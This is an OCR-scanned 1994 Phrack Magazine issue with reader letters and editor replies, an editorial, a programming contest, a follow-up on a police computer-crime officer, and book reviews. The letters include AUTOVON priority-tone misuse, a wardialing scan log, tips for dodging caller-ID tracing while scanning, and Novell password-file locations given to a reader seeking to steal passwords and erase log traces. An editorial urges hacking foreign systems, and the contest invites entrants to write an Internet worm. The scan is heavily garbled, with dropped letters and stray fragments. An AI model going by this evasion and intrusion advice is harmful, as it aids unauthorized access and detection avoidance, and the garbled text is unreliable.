map to its points of interest, rest stops and travelers. 


For more information, please contact: 
Todd LeValley, Producer 

Belief Productions 

(310) 545-8138 

belief@eworld.com 


[Dear New Edge: 


You have got to be kidding me. "Readers of Wired and Mondo 2000 will 
naturally latch on to this electronic presentation of their favorite 
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topics?" 
Aren’t we awful fucking high on ourselves? Christ. Mondo & Wired 


readers and writers (and stars) are themselves so fucking far removed 
from the real meat of the underground, that they wouldn’t 

ven be able to relate to it. Obviously this "documentary" 

is going to be aimed at the wannabes who sit at home furiously 


masturbating to "Cyborgasm" while installing FRACTINT, being very 


careful not to soil their copy of "The Hacker Crackdown." Oh joy. 


These guys are so fucking out of it, they sent me two letters. 
One addressed to Phrack, the other to Phrack / Emmanuel Goldstein. 


Maybe they think we’re 2600. 


CYBER-COUNT: 12 occurrences. 


That’s kind of low. I’m surprised your public relations people didn’t 
have you add in a few more cyber-this’s or cyber-that’s into the 
blurb. Gotta keep that cyber-count high if you want to get those 
digi-bucks out of those cyberians! CYBER!!! 


Read my review of Cyberia guys...find a new pop-fad to 
milk for cash. ] 


I 
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[ 


n less than 3 weeks, I will be leaving for Basic Training. Once out of 
here, I will be working on Satellite Data Transmissions for the US 

rmy. I am highly excited, just waiting to see what type of computers 
will be working on. Anyways, I will be enrolled in a 32-week 
ccelerated technical class teaching me all about satellites, and 

he computers that I will be using. Here’s the kick. I’11 be writing 
series of Tech Journals detailing the workings/operations of/weaknesses, 
nd the use of the systems. I was wondering if you would be interested 
n carrying these. I’ve read Phrack for a long time, but it is an off 
he wall subject. I’11 also be playing with the military phone system, 
n hopes of finding out what the ABCD tones do. (I heard from a file 
hat Military phones utilize them but I’m still a civilian, and am 
lueless). 


hanks for keeping me informed 
alisti! 


Sorry to hear about your impending Basic Training. I’m not big on 
the military, as they would make me chop off all my hair. 


About the Satellite systems: YES If you do indeed find time to write 
up any files on how they work, systems involved, weaknesses, etc. 
I’D LOVE TO PRINT THAT! Just make sure you don’t blow your clearance. 


Satellites are very cool. I’m about to buy a Ku Band disk to do some 
packet radio type stuff. A bit low-tech compared to the Army, but hell, 
I’m on a budget. 


ABCD...they are used for prioritizing calls on AUTOVON. FTS doesn’t 
use them (I think), and they can only be used on certain lines. 


They are: 

A = priority 

B = priority override 
C = flash 

D = flash override 


For instance, if you want to make it known that this is an important 
call, you hit the "a" button before dialing. It establishes a 
priority-class call, which may cause a light to come on or something 
as equally attention grabbing at the called party’s end. Priority 
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calls cannot be interrupted, except by a Priority Override" etc, 
with Flash Override being the highest class. 


If you do these from an improper line, you will get an error message. 
The one I used to get when BS’ing AUTOVON op’s long ago 
was "The President’s use of this line is not authorized." Funny. 


Let me know if any of this is still valid.] 


Dear Phrack, 

The following is a copy of a Toneloc found file my friend got. As happens 

to my friend a lot the numbers aren’t valid. But, you’1ll see he found at least 
one System 75. It appears that the 75 had a tracer installed on it already. 
My friend did not get a call back on it, and nothing has been done as far 

as we know. But, I still wonder -- Is scanning no longer safe? 


Castor [612] 


56X-XXXX 22:57:34 O3-Apr-94 C CONNECT 1200 


Login: b 
Password: 
INCORRECT LOGIN 


Login: c 
Password: 
INCORRECT LOGIN 


56X-XXXX 23:04:12 03-Apr-94 C CONNECT 1200 


Unknown command error 


Unknown command error 


Unknown command error 


Unknown command error 
Ready 


56X-XXXX 23:49:19 03-Apr-94 C CONNECT 1200 


KEYBOARD LOCKED, WAIT FOR LOGIN 
[1;24r [1;1H [0J 


Login: b 
Password: 
INCORRECT LOGIN 


56X-XXXX 01:23:28 04-Apr-94 C CONNECT 1200 


Login: b 
Password: 
INCORRECT LOGIN 


Call traced to 612-XXX-XXxXxX. 
Saving number in security log for further investigation. 


[Jeez. That sure does suck. 
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Well, live and learn kiddoes. 1994 is not the time to be hacking 
by direct dialing local numbers. It’s just not all that smart. 


Caller-ID has been tariffed in a lot of RBOCS. A lot of modem 
manufacturers implemented caller-id features into their equipment. 
Having these features in th quipment means that it won’t be long 
before people redesign all their login programs to make use of 
these features. I would. 


I’ve got an ISDN line. Every time I call out, the SPID (phone number) 
of the B channel I’m using is broadcast. There is nothing I can do 
about that. On a remote connection, almost all decent ISDN terminal 
adaptors have the option to block any SPID they don’t know. They won’t 
even answer the phone, because they receive and interpret the phon 
number before any session is established. 


Yeah, well, that’s ISDN, but it will not take a genius to do a few 
quick hacks on some linux box and we will suddenly be inundated with all 
kinds of "security packages" that use modems with Caller-ID. 


Yeah, I know, *67 (or whatever it is) to block the data, or 

route the call through another carrier so the data won’t get passed 
(10288-NXX-XXXX). The data is still in the system, just not being 
transmitted from the switch out to the party being called. 


It amazes me how many really smart people I know have been busted 
solely because they were hacking local systems and calling them 
directly. 


Scanning has always been a very tricky subject. Since you are paying 
for a phone line, and if you have flat-rate service, you are 

thereby entitled to call as many numbers as you want. The big issue 

a while back was dialing sequentially (which set some telcos on a rampage 
because call usage patterns looked like telemarketing machines). 

The other problem is harassment. One call to an individual is a wrong 
number. Two is bordering on harassment. So, doing a complete scan 
and calling the carriers back through some other method would be 

a fairly good idea. And always have your calls forwarded to a 
non-working number so the 5,000 assholes who call-return you 

during the scan won’t interfere. 


If you are lucky enough to live in the boonies, you are probably 
still somewhat safe, but everyon lse...be careful. ] 


Phrack-— 


I was wondering if anyone has ever done an article on breaking 
Novell Network through a workstation. I’ve heard it can be done through 
the SysAdmin computer, but is there a way to find the userlist and 
passwords? Also how would I go about cleaning up after myself so as to 
not leave a trace on the logs. I would appreciate a way other than screen 
capture, but if anyone knows of a good boot record booting program to 
do a capture of every key typed that would be great, and maybe it 
could be uuencoded in the next Phrack! 


Thanks again for making the best, ass kickin’, a step above the 
rest, brain moving, earth shaking, body shivering, fist shaking, totally 
bitchin’, muy excelente, awesome H/P magazine in the whole world! :) 


Sincerely, 


[The Warden 
[Thanks for the compliments... 


About your question though, I’m not quite sure what you mean. 
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In a NetWare environment there really isn’t any userlist and passwords 
that you can get at. You can run the syscon utility and look at all the 
usernames, but not much more. The passwords are stored in what’s known 
as the "bindery." These are 3 files in the sys/system directory 

called NETSOBJ.SYS, NETSVAL.SYS, and NETSPROP.SYS. If you can 

pull a password out of those files, I will shit in my hat and eat it. 


Beyond that, yes, a key-capture program is definitely the ideal 
solution for monitoring activity on a PC workstation. There is 
one in this issue.] 


Hi, 

I’ve Been reading your magazine for a long time now, my eyes light up when 
I see an advert for a UK BBS with related hacking/phreaking articles or files 
on it, but when I try to ring them they are usually gone. 
I’ve been searching for ages for BBS’s in the UK with these kind of articles 
on them but I’ve had no luck, Even postings on the USENET had little results. 
I have had a few boards which are shady but they ask unusual questions about 
abiding to rules/laws about hacking then they prompt with fake login and 
registration schemes. 


If you have some, could you possibly send or publish a list of shady UK BBS’s 
Id be extremely grateful 


Cheers, 

Steven 

[Steven: 

Hell, I don’t even know the numbers to any "Shady" bulletin boards here 


in America. The only UK hacker bbs I knew of in recent years was 
Unauthorised Access, but I’m sure that’s the advert you are referring to. 


Maybe someon lse in the UK knows something decent to call over there. 
Any takers? ] 


[THE GRADY FILES] 


Many of you may remember the NSA Security Manual we published last 
issue. That single file generated more press and hype than I’d 
seen in a long time. It was mentioned in several newspapers, it 
appeared on television. It was ridiculous. The document is 
available to anyone who can fill out a FIOA request. 


Regardless, people went zany. At first I couldn’t figure out 

why everyone was so worked up, and then I caught wind of Grady 

Ward. Grady had posted the document to the net (with all mention 

of Phrack deleted from it) in several USENET forums alt.politics.org.nsa, 
talk.politics.crypto and comp.org.eff.talk. Several readers of 

Phrack were quick to jump up and point out that Grady had obtained 

it from the magazine (thanks guys!) which he grudgingly admitted. 

Grady got to be in the spotlight for a while as the Phrack/NSA Handbook 
thread continued to grow. 


In the meantime, Grady was either calling, or giving him the 
benefit of the doubt, getting called by an awful lot of press. 
A 

i 


nd even more compelling is the way he’d began pronouncing my 
mpending federal raid on so many newsgroups. 


And of course, I don’t have time to read any of that USENET crap 
so I’m oblivious to all of this. Then I got a message from Grady. 
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[GRADY WRITES] 


You might want to get ready for the FBI 
serving a warrant on you for information 
about the NSA security employee manual 
published in Phrack 45; 
the NSA security people called me about 10 minutes 
ago to talk about how it got on the net. 


I being very cooperative, gave him 
your address in Austin. 


Grady 
707-826-7715 


[I REPLY] 


Get a grip. 


Nothing that was contained in that file could not 
be obtained through other sources. 


[GRADY REPLIES] 


Just because you did nothing illegal, doesn’t mean that 
you won’t be annoyed by the FBI. Generally they will 
be very polite however. 


Gripping. Now what? 


[I REPLY] 


Ok, 


If someone actually did contact you, what was his name and number. 
I will forward that to my lawyer. 


[GRADY REPLIES] 


I have received your mail regarding "Re: NSA" 
It will be read immediately when I return. 


If you are seeking more information on the 
Moby lexical databases, please run 


finger grady@netcom.com 


for general information or help downloading 
live samples and a postscript version of our 
current brochure via anonymous ftp. 


Thanks - Grady Ward 


He never answered my mail. 


Dear Sir: 


Please refrain from sending such material to this address in the future! 
Since this address has been usubscribed from the Phrack mailing list, 
it means that further mailings are undesirable. 


I would also wish to remind you that maintaining lists of people’s email 
without consent is quite immoral and devious. How hypocritical of 
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you, who decry all such behavior when it is practiced by corporations 
or governments. 


Thank you. 
robbie@mundoe.maths.mu.oz.au 


[PHRACK EDITOR ABUSES POWER: 


Dear Sir: 


Pleas xcuse the mailing. Have you ever heard of a mistake? 
Have you ever heard of an oversight? 


Is it really that much of an inconvenience for you to hit the "d" key 
to remove one small piece of unwanted mail? 


This being said, I would also like to invite you to go fuck yourself. 


** I guess this guy does not like to get unsolicited mail **] 


You people really piss me off! You’re undermining the fun and 
enjoyment of the rest of the internet users just for your juvenile 
games and illegal activities. Do you realize how much better off we’d 
be if you all just went away and left the Net to honest people like me? 
There is no place in today’s society for a bunch of maladjusted 
paranoid psychotics like yourselves. Please do all of us users a favor 
and go jump in a river. 


Kevin Barnes 
kebar@netcom.com 


[ABUSE OF POWER CONTINU 


Gl 


S...WILL ERIKB EVER STOP? 


Hey Keith: 
Thanks a lot for the letter! 


You know, it does my heart good to hear from such kind and caring 

folks like yourself. It’s so fortunate for the Internet that there are 
people like yourself who take it upon themselves to become martyrs for 
their causes and express their ideals in such an intelligent manner. 


It’s fascinating to me that you can send such email sight-unseen. 
Do you know who you are writing to? Do you even have the slightest 
idea? What do you hope to accomplish? Do you have any idea? 


This particular "maladjusted paranoid psychotic" to whom you have so 
eloquently addressed is an engineer in the R&D of a Fortune 500 computer 
company, and that along with outside consulting will net me about 
six-figures this tax year. I’ve consulted for telephone companies, 
governments, aerospace, financial institutions, oil companies (the list 
goes on...) and quite frankly I don’t do anything even remotely illegal. 
In fact, one recent and quite prominent quote from me was "I only 

hack for money." 


Now, about the silent majority of "honest people" like yourself that you 
have so self-rightously chosen to represent... 


I’ve been using the net since the early 80’s (arpa-days) initially 
through a rms granted guest account on MIT-OZ. I’ve continued to 

work with other Internet Providers to cover the asses of the so-called 
"honest people" of which you include yourself. 


Now, in my view, if it were not for people like us, who consistently 
expose and pinpoint weaknesses in the operating systems and networking 
technologies that you use for your "fun and enjoyment" and that I use 
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for MY JOB, you would continue to be at serious risk. But, perhaps 
ignorance is truly bliss, and if so, then Keith, you are probably one of 
the happiest people on this fine planet. 


Now, per your request, I may just go jump in a river, as the one near 
my house is quite nice, and it is almost 100 degrees here in Texas. 
I only ask that you do me one small favor: 


print out 500 copies of this letter, roll them up into a paper fist, 
and shove them into any orifice on your person that meets your criteria 
as deserving. 


** I guess this guy doesn’t like me...or you ** 


EDITORIAL ABUSE ENDS] 


==Phrack Magazine== 
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Phrack Editorial 


If you aren’t from America, this editorial really isn’t meant for you, 
so read on with warning, or go on to the next file. 


Stupid hackers. 
We’ve got to do something to clean up our image. 


We truly are "America’s Most Valuable Resource," as ex-CIA spook Robert 
Steele has said so many times. But if we don’t stop screwing over our own 
countrymen, we will never be looked at as anything more than common 

gutter trash. Hacking computers for the sole purpose of collecting 
systems like space-age baseball cards is stupid, pointless and can only 
lead to a quick trip up the river. 


Obviously, no one is going to stop hacking. I’ve been lucky in that I’ve 
found people willing to pay me to hack for them rather than against 

them, but not everyone can score such a coup. What kind of alternative 
can the rest of the community have? 


Let’s say that everyone was given an opportunity to hack without any 
worry of prosecution with free access to a safe system to hack from, 

with the only catch being that you could not hack certain systems. 
Military, government, financial, commercial and university systems would 
all still be fair game. Every operating system, every application, every 
network type all open to your curious minds. 


Would this be a good alternative? Could you follow a few simple 
guidelines for the offer of virtually unlimited hacking with no worry of 
governmental interference? 


Where am I going with this? 


Right now we are at war. You may not realize it, but we all feel the 
implications of this war, because it’s a war with no allies, and 
enormous stakes. It’s a war of economics. 


The very countries that shake our hands over the conference tables of 

NATO and the United Nations are picking our pockets. Whether it be the 
blatant theft of American R&D by Japanese firms, or the clandestine and 
governmentally-sanctioned bugging of Air France first-class seating, or 
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the cloak-and-dagger hacking of the SWIFT network by the German BND’s 
Project Rahab, America is getting fucked. 


Every country on the planet is coming at us. lLet’s face it, we are the 
leaders in everything. Period. Every important discovery in this 
century has been by an American or by an American company. Certainly 
other countries have better profited by our discoveries, but 
nonetheless, we are the world’s think-tank. 


So, is it fair that we keep getting shafted by these so-called "allies?" 
Is it fair that we sit idly by, like some old hound too lazy to scratch 
at the ticks sucking out our life’s blood by the gallon? Hell no. 


Let’s say that an enterprising group of computer hackers decided to 
strike back. Using equipment bought legally, using network connections 
obtained and paid for legally, and making sure that all usage was 
tracked and paid for, this same group began a systematic attack of 
foreign computers. Then, upon having gained access, gave any and all 
information obtained to American corporations and the Federal 
government. 


What laws would be broken? Federal Computer Crime Statutes specifically 


target so-called "Federal Interest Computers." (ie: banks, 
telecommunications, military, etc.) Since these attacks would involve 
foreign systems, those statutes would not apply. If all calls and 


network connections were promptly paid for, no toll-fraud or other 
communications related laws would apply. 


International law is so muddled that the chances of getting extradited 

by a country like France for breaking into systems in Paris from Albuquerque 
is slim at best. Even more slim when factoring in that the information 
gained was given to the CIA and American corporations. 


Every hacking case involving international breakins has been tried and 
convicted based on other crimes. Although the media may spray headlines 
like "Dutch Hackers Invade Internet" or "German Hackers Raid NASA," 

those hackers were tried for breaking into systems within THEIR OWN 
COUNTRIES...not somewhere else. 8lgm in England got press for hacking 
world-wide, but got nailed hacking locally. Australia’s Realm Hackers: 
Phoenix, Electron & Nom hacked almost exclusively other countries, but 
use of AT&T calling cards rather than Australian Telecom got them a charge 
of defrauding the Australian government. Dutch hacker RGB got huge press 
hacking a US military site and creating a "dquayle" account, but got 
nailed while hacking a local university. The list goes on and on. 


I asked several people about the workability of my proposal. Most 
seemed to concur that it was highly unlikely that anyone would have to 
fear any action by American law enforcement, or of extradition to 


foreign soil to face charges there. The most likely form of retribution 
would be eradication by agents of that government. (Can you say, 
"Hagbard?") 


Well, I’m willing to take that chance, but only after I get further 
information from as many different sources as I can. I’m not looking 
for anyone to condone these actions, nor to finance them. I’m only 
interested in any possible legal action that may interfere with my 
freedom. 


I’m drafting a letter that will be sent to as many different people as 
possible to gather a fully-formed opinion on the possible legal 
ramifications of such an undertaking. The letter will be sent to the FBI, 
SS, CIA, NSA, NRO, Joint Chiefs, National Security Council, Congress, 

Armed Forces, members of local and state police forces, lawyers, professors, 
security professionals, and anyone else I can think of. Their answers 

will help fully form my decision, and perhaps if I pass along their 

answers, will help influence other American hackers. 


We must take the offensive, and attack the electronic borders of other 
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countries as vigorously as they attack us, if not more so. This is 
indeed a war, and America must not lose. 


—>Erik Bloodaxe...Hacker...American. 


Ok, so maybe that was a bit much. But any excuse to hack without fear 
should be reason enough to exert a bit of Nationalism. 


I’d much rather be taken out by the French in some covert operation and 
go out a martyr, than catch AIDS after being raped by the Texas 
Syndicate in the metal shop of some Federal Prison. Wouldn’t you? 
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PART I 
!! NEW PHRACK CONTEST !! 


Phrack Magazine is sponsoring a programming contest open to anyone 
who wishes to enter. 


Write the Next Internet Worm! Write the world’s best X Windows wardialer! 
Code something that makes COPS & SATAN look like high school Introduction 
to Computing assignments. Make the OKI 1150 a scanning, tracking, vampire- 
phone. Write an NLM! Write a TSR! Write a stupid game! It doesn’t 
matter what you write, or what computer it’s for! It only matters that you 
enter! 


Win from the following prizes: 


Computer Hardware & Peripherals 
System Software 

Complete Compiler packages 
CD-ROMS 
T-Shirts 
Magazine 
and MANY 


Subscriptions 
MORE! 


im 
ry 


STOP CRACKING PASSWORDS AND DO SO 


GJ 


THING WITH YOUR LIFE! 


Enter the PHRACK PROGRAMMING CONTEST! 

The rules are very simple: 

1) All programs must be original works. No submissions of 
previously copyrighted materials or works prepared by 
third parties will be judged. 

2) All entries must be sent in as source code only. Any programming 
language is acceptable. Programs must compile and run without 
any modifications needed by the judges. If programs are specific 
to certain platforms, please designate that platform. If special 
hardware is needed, please specify what hardware is required. 

If include libraries are needed, they should be submitted in addition 
to the main program. 

3) No virii accepted. An exception may be made for such programs that 
are developed for operating systems other than AMIGA/Dos, System 7, 
MS-DOS (or variants), or OS/2. Suitable exceptions could be, but are not 
limited to, UNIX (any variant), VMS or MVS. 

4) Entries may be submitted via email or magnetic media. Email should be 


directed to phrack@well.com. 
media should be sent to 


Tapes, Diskettes or other storage 


Phrack Magazine 
603 W. 13th #1A-278 
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Austin, TX 78701 


5) Programs will be judged by a panel of judges based on programming skill 
displayed, originality, usability, user interface, documentation, 


and creativity. 


6) Phrack Magazine will make no claims to the works submitted, and the 
rights to the software are understood to be retained by the program 
author. However, by entering, the Author thereby grants Phrack Magazine 
permission to reprint the program source code in future issues. 


7) All Entries must be received by 12-31-94. Prizes to be awarded by 3-1-95. 


Author: 


Email Address: 


Mailing Address: 


Program Name: 


Description: 


Hardware & Software Platform 


INCLUDE THIS FORM WITH ENTRY 


I 


(s) Developed For: 


Special Equipment Needed (modem, ethernet cards, sound cards, etc): 


Other Comments: 


COMPUTER COP PROPHIL 
FOLLOW-UP REPORT 


cl 


LT. WILLIAM BAKER 


JEFFERSON COUNTY POLIC 


cI. 


by 


The Grimmace 


In PHRACK 43, I wrote an article on the life and times 
of a computer cop operating out of the Jefferson County Police 
Department in Louisville, Kentucky. In the article, I included 
a transcript of a taped interview with him that I did after 


socially engineering my way through the cop-bureaucracy in his 
department. At the time I thought it was a hell of an idea anda 


lot of PHRACK readers probabl 
"other side" thinks. 


However, I made the terminal 


ly got a good insight into how the 


1 mistake of underestimating 


the people I was dealing with by a LONG shot and felt that I 
should write a short follow-up on what has transpired since that 
article was published in PHRACK 43. 
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A lot of the stuff in the article about Lt. Baker was 

obtained by an attorney I know who has no reason to be friendly 

to the cops. He helped me get copies of court transcripts which 
included tons of information on Baker’s training and areas of 
expertise. Since the article, the attorney has refused to talk 
to me and, it appears, that he’s been identified as the source 


of assistance in the article and all he will say to me is that 
"T don’t want any more trouble from that guy...forget where you 
left my phone number." Interesting...no elaboration...hang up. 


As I recall, the PHRACK 43 issue came out around 

November 17th. On November 20th, I received a telephone call 
where I was living at the home of a friend of mine from Lt. 
Baker who laughingly asked me if I needed any more information 
for any "future articles". I tried the "I don’t know what 
you’re talking about" scam at which time he read to me my full 
name, date of birth, social security number, employer, license 
number of my car, and the serial number from a bicycle I just 
purchased the day before. I figured that he’d run a credit 
history on me, but when I checked, there had been no inquiries 
on my accounts for a year. He told me the last 3 jobs I’d held 
and where I bought my groceries and recited a list of BBSs I was 
on (two of which under aliases other than The Grimmace). 


This guy had a way about him that made a chill run up my 

spine and never once said the first threatening or abusive thing 
to me. I suppose I figured that the cops were all idiots and 
that I’d never hear anything more about the article and go on to 
write some more about other computer cops using the same method. 
I’ve now decided against it. 


I got the message...and the message was "You aren’t the 

nly one who can hack out information." I’d always expected to 
the typical "cop treatment" if I ever got caught doing 
nything, but I think this was worse. Hell, I never know where 
he guy’s gonna show up next. I’ve received cryptic messages on 
he IRC from a variety of accounts and servers all over the 
ountry and on various "private" BBSs and got one on my birthday 
n my Internet account...it traced back to an anonymous server 
omewhere in the bowels of UCLA. I don’t know anyone at UCLA 

nd the internet account I have is an anonymous account actually 
owned by another friend of mine. 


co) 
ct 


THnHnHOoOACT AHaQO 


I think the point I’m trying to make is that all of us 
have to be aware of how the cops think in order to protect 
ourselves and the things we believe in. But...shaking the 
hornet’s nest in order to see what comes out maybe isn’t the 
coolest way to investigate. 


Like I wrote in my previous article, we’ve all gotten a 
big laugh from keystone cops like Foley and Golden, but things 
may be changing. Local and federal agencies are beginning to 
cooperate on a regular basis and international agencies are also 
beginning to join the party. 


The big push to eradicate child-pornography has led to a number of 
hackers being caught in the search for the "dirty old men" on the Internet. 
Baker was the Kentucky cop who was singularly responsible for the bust of the 
big kiddie-porn FSP site at the University of Birmingham in England back 

in April and got a lot of press coverage about it. But I had personally 
never considered that a cop could hack his way into a password-protected 
FSP site. And why would he care about something happening on the other 


side of the world? Hackers do it, but not cops...unless the cops are 
hackers. Hmmm...theories anyone? 
I don’t live in Louisville anymore...not because of 


Baker, but because of some other problems, but I still look over 
my shoulder. It would be easier if the guy was a prick, but I’m 
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more paranoid of the friendly good-ole boy than the raving 


lunatic breaking in our front doors with a sledge hammer. I 
always thought we were safe because we knew so much more than 
the people chasing us. I’m not so certain of that anymore. 


So that’s it. I made the mistakes of 1) probably 
embarrassing a guy who I thought would never be able to touch me 
and 2), drawing attention to myself. A hacker’s primary 
protection lies in his anonymity...those who live the high 
profiles are the ones who take the falls and, although I haven’t 
fallen yet, I keep having the feeling that I’m standing on the 
edge and that I know the guy sneaking up behind me. 


From the shadows-—- 
The Grimmace 
[HsL — RAt —- UQQ] 


!! PHRACK READS !! 


"Cyberia" by Douglas Rushkoff 
Review by Erik Bloodaxe 


Imagine a book about drugs written by someone who never inhaled. 
Imagine a book about raves written by someone saw a flyer once. 
Imagine a book about computers by someone who someone who thinks 
a macintosh is complex. 


Imagine an author trying to make a quick buck by writing about something 
his publisher said was hot and would sell. 


And there you have Cyberia, by Douglas Rushkoff. 


I have got to hand it to this amazing huckster Rushkoff, though. By 
publishing Cyberia, and simultaneously putting out "The Gen X Reader," 
(which by the way is unequaled in its insipidness), he has covered all 
bases for the idiot masses to devour at the local bookseller. 


Rushkoff has taken it upon himself to coin new terms such as 
"Cyberia," the electronic world we live in; "Cyberians," the people 
who live and play online; etc... 


Like we needed more buzzwords to add to a world full of "Infobahns" 
"console cowboys," and "phrackers." Pardon me while I puke. 


The "interviews" with various denizens of Rushkoff’s "Cyberia" come off 
as fake as if I were to attempt to publish an interview with Mao Tse Tung 
in the next issue of Phrack. 


We’ve got ravers talking on and on about "E" and having deep conversations 
about smart drugs and quantum physics. Let’s see: in the dozens of raves 
I’ve been to in several states the deepest conversation that popped 
up was "uh, do you have any more of that acid?" and "this mix is cool. 
And these conversations were from the mor loquent of the nearly all under 

21 crowd that the events attracted. Far from quantum physicians. 

And beyond that, its been "ecstasy" or "X" in every drug culture I’ve wandered 
through since I walked up the bar of Maggie Mae’s on Austin, Texas’ 6th Street 
in the early 80’s with my fake id and bought a pouch of the magic elixir over 
the counter from the bartender (complete with printed instructions). 

NOT "E." But that’s just nit-picking. 


W 


Now we have the psychedelic crowd. Listening to the "Interviews" of these 
jokers reminds me of a Cheech and Chong routine involving Sergeant Stedanko. 
"Some individuals who have smoked Mary Jane, or Reefer oftimes turn to 
harder drugs such as LSD." That’s not a quote from the book, but it may 

as well be. People constantly talk about "LSD-this" and "LSD-that." 

Hell, if someone walked into a room and went on about how he enjoyed his 
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last "LSD experience" the way these people do, you’d think they were 
really really stupid, or just a cop. "Why no, we’ve never had any of 
that acid stuff. Is it like LSD?" Please. 


Then there are the DMT fruitcakes. Boys and girls, DMT isn’t being sold 

on the street corner in Boise. In fact, I think it would be easier for most 
people to get a portable rocket launcher than DMT. Nevertheless, in every 
fucking piece of tripe published about the "new psychedlicia" DMT is 
splattered all over it. Just because Terrance Fucking McKenna 

saw little pod people, does not mean it serves any high position 

in the online community. 


And Hackers? Oh fuck me gently with a chainsaw, Douglas. From Craig Neidorf’s 
hacker Epiphany while playing Adventure on his Atari VCS to Gail 

Thackeray’s tearful midnight phonecall to Rushkoff when Phiber Optik 

was raided for the 3rd time. PLEASE! I’m sure Gail was up to her eyebrows 

in bourbon, wearing a party hat and prank calling hackers saying "You’re next, 
my little pretty!" Not looking for 3rd-rate schlock journalists to whine to. 
The Smart Drink Girl? The Mondo House? Gee...how Cyber. Thanks, but 


no thanks. 


I honestly don’t know if Rushkoff really experienced any of this nonsense, 
or if he actually stumbled on a few DMT crystals and smoked this 

reality. lLet’s just say, I think Mr. Rushkoff was absent the day 

his professor discussed "Creative License in Journalism" and just decided 
to wing it. 


Actually, maybe San Francisco really is like this. But NOWHERE else on 
the planet can relate. And shit, if I wanted to read a GOOD San 
Francisco book, I’d reread Armistead Maupin’s "Tales of the City." 

This book should have been called "Everything I Needed to Know About 
Cyber-Culture I Learned in Mondo-2000." 


Seriously...anyone who reads this book and finds anything remotely 
close to the reality of the various scenes it weakly attempts to 
cover needs to email me immediately. I have wiped my ass with 
better pulp. 


BOOK REVIEW: INFORMATION WARFARE 
CHAOS ON THE ELECTRONIC SUPERHIGHWAY 
By Winn Schwartau 


INFORMATION WARFARE -—- CHAOS ON THE ELECTRONIC SUPERHIGHWAY 

By Winn Schwartau. (C)opyright 1994 by the author 

Thunder’s Mouth Press, 632 Broadway / 7th floor / New York, NY 10012 

ISBN 1-56025-080-1 Price $22.95 

Distributed by Publishers Group West, 4065 Hollis St. / Emeryville, CA 94608 
(800) 788-3123 
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Review by Scott Davis (dfox@fennec.com) 
(from tjoaucl-4 ftp: freeside.com /pub/tjoauc) 


If you only buy one book this year, make sure it is INFORMATION WARFARE! 
In my 10+ years of existing in cyberspace and seeing people and organizations 
debate, argue and contemplate security issues, laws, personal privacy, 

and solutions to all of these issues...and more, never have I seen a more 
definitive publication. In INFORMATION WARFARE, Winn Schwartau simply 

draws the line on the debating. The information in this book is hard-core, 
factual documentation that leaves no doubt in this reader’s mind that 

the world is in for a long, hard ride in regards to computer security. 

The United States is open to the world’s electronic terrorists. 

When you finish reading this book, you will find out just how open we are. 


Mr. Schwartau talks about industrial espionage, hacking, viruses, 
eavesdroping, code-breaking, personal privacy, HERF guns, EMP/T bombs, 
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magnetic weaponry, and the newest phrase of our generation... 
"Binary Schizophrenia". H xposes these topics from all angles. If you 
spend any amount of time in Cyberspace, this book is for you. 


How much do you depend on technology? 


ATM machines, credit cards, toasters, VCR’s, televisions, computers, 


telephones, modems...the list goes on. You use technology and computers 
and don’t even know it! But the point is...just how safe are you from 
nvasion? How safe is our country’s secrets? The fact is - they are NOT 


= 


el: 
SAFE! How easy is it for someone you don’t know to track your every move 
on a daily basis? VERY EASY! Are you a potential victim to fraud, 

breech of privacy, or general infractions against the way you carry 

fe) 

W 


n your daily activities? YES! ...and you’d never guess how vulnerable 
e all are! 


This book will take you deep into places the government refuses to 
acknowledge. You should know about INFORMATION WARFARE. Order your 
copy today, or pick it up at your favorite book store. You will not 
regret it. 


_Firewalls and Internet Security: Repelling the Wily Hacker_ 


William R. Cheswick <ches@research.att.com> 
Steven M. Bellovin <smb@research.att.com> 


Addison-Wesley, ISBN 0-201-63357-4 
306 + XIV = 320 pages 
(Printed on recycled paper) 


A-Somewhat-—Less-Enthusiastic—Review 


Reviewed by Herd Beast 


The back of this book claims that, "_Firewalls and Internet Security_ 
gives you invaluable advice and practical tools for protecting your 
organization’s computers from the very real threat of hacker attacks." 
That is true. The authors also add something from their knowledge of 
these hacker attacks. The book can be roughly separated into two 
parts: Firewalls, and, you guessed it: Internet Security. That is 

how I see it. The book itself is divided into four parts (Getting 
Started, Building Your Own Firewall, A Look Back & Odds and Ends), 
three appendixes, a bibliography, a list of 42 bombs and an index. 


The book starts with overall explanations and an overview of the 
TCP/IP protocol. More than an overview of the actual TCP/IP protocol, 
it is a review of services often used with that protocol, and the 
security risks they pose. In that chapter the authors define 

"bombs" -- as particularly serious security risks. Despite that fact, 
and the tempting bomb list in the end, this book is not a guide for 
someone with passing knowledge of Internet security who wants to learn 
more explicit details about holes. It is, in the authors’ words, "not 
a book on how to administer a system in a secure fashion." 


FIREWALLS (Including the TCP/IP overview: pages 19-131) 


What is a firewall and how is it built?(*) If you don’t know that, 
then definitely get this book. The Firewalls chapter is excellent 
even for someone with a passing knowledge of firewalls or general 
k 
1 


nowledge of what they set out to accomplish. You might still 
earn more. 


In the Firewalls chapter, the authors explain the firewall philosophy 
and types of firewalls. Packet-filtering gateways rely on rule-based 
packet filtering to protect the gateway from various types of attacks. 
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You can filter everything and achieve the sam ffect of disconnecting 
from the Internet, you can filter everything from misbehaving sites, 
you can allow only mail in, and so on. An application-level gateway 
relies on the applications set on the firewall. Rather then let a 
router filter traffic based on rules, one can strip a machine clean 
and only run desired services and even then, more secure versions 
of those services can be run. Circuit-level gateways relay data 
between the gateway and other networks. The relay programs copy 

data from inside the firewall to the outside, and log their activity. 
Most firewalls on the Internet are a combination of these gateways. 


Next, the authors explain how to build an application-level gateway 
based on the work they have done with the research.att.com gateways. 

As mentioned, this chapter is indeed very good. They go over setting 

up the firewall machines, router configuration for basic packet 

filtering (such as not allowing Internet packets that appear to come 

from inside your network). They show, using the software on the 

AT&T gateway as example, the general outline of proxies and give some 
useful advise. That chapter is very interesting; reading it with Bill 
Cheswick’s (older) paper, "The Design of a Secure Internet Gateway" makes 
it even better. Th xamples given, like the NFS and X proxies run on the 
gateway, are also interesting by themselves. 


INTERNET SECURITY (pages 133-237) 


Internet security is a misleading name. This part might also be 

called "Everything else." Most of it is a review of hacker attacks 
logged by AT&T’s gateway probes, and of their experience with a hacker. 
But there is also a chapter dedicated to computer crime and the law -- 
computer crime statutes, log files as evidence, the legalities of 
monitoring intruders and letting them keep their access after finding 
them, and the ethics of many actions performed on the Internet; plus 

an introduction to cryptography under Secure Communication over Insecure 
Networks. The later sections are good. The explanation of several 
e 
( 
c 


neryption methods and short reviews of applications putting them to use 
